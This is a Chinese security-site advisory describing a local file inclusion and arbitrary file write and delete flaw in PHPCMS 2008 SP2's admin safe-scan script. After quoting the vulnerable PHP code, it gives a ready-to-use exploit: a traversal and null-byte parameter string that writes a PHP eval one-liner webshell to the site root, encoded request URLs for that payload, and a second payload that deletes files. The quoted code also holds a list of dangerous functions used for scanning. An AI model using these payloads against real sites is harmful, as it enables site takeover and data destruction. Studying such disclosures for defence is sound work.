首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
PHPCMS 2008 SP2 本地文件包含漏洞和任意文件下载漏洞
来源:vfocus.net 作者:vfocus 发布时间:2011-04-07  

‍Phpcms 是国内领先的网站内容管理系统,同时也是一个开源的PHP开发框架。Phpcms由内容模型、会员、问吧专题、财务、订单、广告、邮件订阅、短消息、自定义表单、全站搜索等20多个功能模块组成,内置新闻、图片、下载、信息、产品5大内容模型。Phpcms 采用模块化开发,支持自定义内容模型和会员模型,并且可以自定义字段
  PHPCMS的技术优势主要体现在系统的稳定性、扩展性、安全性、全面性,在负载能力和发布效率上具有突出的优势。

phpcms本地包含类漏洞,如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。由于phpcms的全局变量机制,导致能拿shell的方法很多,类似的问题不止一个。admin/safe.inc.php文件是后台扫木马的程序,但是很可惜的是虽然文件名叫做safe,但是一点也不safe。

贴上存在漏洞的代码
/admin/safe.inc.php

-----------------------------------------------------
 

<?php defined(‘IN_PHPCMS’) or exit(‘Access Denied’);  // include/common.inc.php 里面声明了常量  // define(‘IN_PHPCMS’, TRUE);   if(empty($action)) $action = “start”;  $safe = cache_read(‘safe.php’);  $filecheck = load(‘filecheck.class.php’);  if(empty($safe))  {  $safe = array (  ‘file_type’ => ‘php|js’,  ‘code’ => ”,  ‘func’ => ‘com|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzuncompress’,  ‘dir’ => $filecheck->checked_dirs()  );  }  switch ($action)  {  …  case ‘edit_code’:  if (file_put_contents(PHPCMS_ROOT.$file_path, stripcslashes($code)))  {  showmessage(‘修改成功!’);  }  break;   case ‘del_file’:  $file_path = urldecode($files);   if (empty($file_path))  {  showmessage(‘请选择文件’);  }  $file_list = cache_read(‘scan_backdoor.php’);  unset($file_list[$file_path]);  cache_write(‘scan_backdoor.php’,$file_list);  @unlink(PHPCMS_ROOT.$file_path);  showmessage(‘文件删除成功!’, ‘?mod=phpcms&file=safe&action=scan_table’);  break;  …  

‍---------------------------------------------------

 拿shell的方法:

包含:admin/safe.inc.php文件GET提交一下数据

将在根目录下生成一句话
用上一篇得到的密钥$key=’sIpeofogblFVCildZEwe’;
加密如下字符串
$evil=’i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00′;

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChx

gNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=

将在根目录下生成一句话木马

同理任意文件删除漏洞:
$evil=’i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00′;

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtB

DwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·电大在线在线远程教学平台0DAY(
·千博购物系统QShopNet SQL注入漏
·ShopEx V4.8(v4.84,v4.85) 后台
·phpcms的另一个phpcms_auth函数
·乔客(joekoe) CMS 4.0 上传与SQL
·DZ-X1.5 论坛最新后台拿 WebShel
·DedeCMS. 织梦科技注入爆管理员
·Siteserver CMS 最新批量拿站 0D
·phpwind (manage.php)SQL注射
·蓝科企业网站管理系统中英繁版V1
·Phpspy 2010 shell 身份验证绕过
·简单文章管理系统 cookie注入漏
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved